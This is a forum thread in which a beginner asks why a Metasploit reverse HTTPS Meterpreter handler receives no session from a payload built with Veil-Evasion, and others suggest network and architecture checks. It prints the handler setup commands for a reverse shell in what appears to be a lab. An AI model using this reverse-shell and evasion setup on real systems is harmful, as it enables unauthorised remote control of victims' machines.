becckman Posted January 21, 2018 Share Posted January 21, 2018 I am very new to kali linux and this stuff, I'm watching a tutorial and mine did not really work out as the tutorial showed. So I generated a reverse meterpreter with veil evasion which i have downloaded on another machine. My msf exploit does not fucntion properly though, i don't get any sessions etc. Expected behavior msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(multi/handler) > set LHOST 10.0.2.15 LHOST => 10.0.2.15 msf exploit(multi/handler) > set LPORT 8080 LPORT => 8080 msf exploit(multi/handler) > exploit [] Started HTTPS reverse handler on https://10.0.2.15:8080 [] Starting the payload handler... Current behavior msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(multi/handler) > set LHOST 10.0.2.15 LHOST => 10.0.2.15 msf exploit(multi/handler) > set LPORT 8080 LPORT => 8080 msf exploit(multi/handler) > exploit [*] Started HTTPS reverse handler on https://10.0.2.15:8080 Machine System Kali Linux 2017 Metasploit version metasploit v4.16.31-dev When watching the CPU on target machine's task manager i can see that the program works, but still I get no sessions. Thanks in advance for all help. Quote Link to comment Share on other sites More sharing options...
digininja Posted January 21, 2018 Share Posted January 21, 2018 Did you build the executable properly and is it pointing at your correct IP and port? Can the two machines see each other? Quote Link to comment Share on other sites More sharing options...
becckman Posted January 21, 2018 Author Share Posted January 21, 2018 What I know of they are properly executable but they can't be as it's not working i guess. I can ping between the attacker and victim, is there any other way to see if it is correctly built or not ? Quote Link to comment Share on other sites More sharing options...
digininja Posted January 21, 2018 Share Posted January 21, 2018 Can you ping victim to attacker, that is the important route for a reverse connection. What command are you using to build the exe? Quote Link to comment Share on other sites More sharing options...
becckman Posted January 21, 2018 Author Share Posted January 21, 2018 Yes I can ping from the victim to the attacker, I generated the exe in Veil-Evasion. Quote Link to comment Share on other sites More sharing options...
digininja Posted January 21, 2018 Share Posted January 21, 2018 Generate your exe on the command line and make sure you pass the right parameters. https://www.veil-framework.com/veil-command-line-usage/ Also make sure your listener is using the correct handler. As an extra check, fire up Wireshark on both machines to watch for network traffic. Quote Link to comment Share on other sites More sharing options...
becckman Posted January 21, 2018 Author Share Posted January 21, 2018 Not sure if it's a bug or me doing wrong as I get no errors or anything, it's just blank after "Started HTTPS reverse handler on https://10.0.2.15:8080". I might be wrong, ( I don't know much about this ) but im pretty certain the problem lays in metasploit and not in Veil ( even if I coded wrong in Veil ) as the program works, but the issue comes up in metasploit which is not really related to the veil program at first is it? Quote Link to comment Share on other sites More sharing options...
becckman Posted January 21, 2018 Author Share Posted January 21, 2018 Also, the exe is functioning properly I think as it is on the list of backgound proccesses on the victim machine after I start the exe. Quote Link to comment Share on other sites More sharing options...
digininja Posted January 21, 2018 Share Posted January 21, 2018 Drop wireshark or tcpdump on both machines and watch for traffic. If you see it going out then the victim is calling home but being ignored or not being seen, if you don't see the call out, the victim is broken, if you don't see the receipt on the attacker machine, the routing is broken, if you see traffic on the attacker then the listener is broken. Quote Link to comment Share on other sites More sharing options...
digip Posted January 22, 2018 Share Posted January 22, 2018 The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system. Quote Link to comment Share on other sites More sharing options...
becckman Posted January 22, 2018 Author Share Posted January 22, 2018 The exploit itself is not related at all to the victim and exe before the exe is opened and a session is started right? Because it is in the exploit before ican open the exe it breaks, no errrors doe just blank.. Quote Link to comment Share on other sites More sharing options...
becckman Posted January 22, 2018 Author Share Posted January 22, 2018 (edited) 6 minutes ago, digip said: The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system. How can I see or change the bit rate when creating the exe? I know the Kali Linux machine is in 64 bit. Edited January 22, 2018 by becckman Quote Link to comment Share on other sites More sharing options...
Zeynalik Posted March 21, 2018 Share Posted March 21, 2018 Did you fix it? I have same problem. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.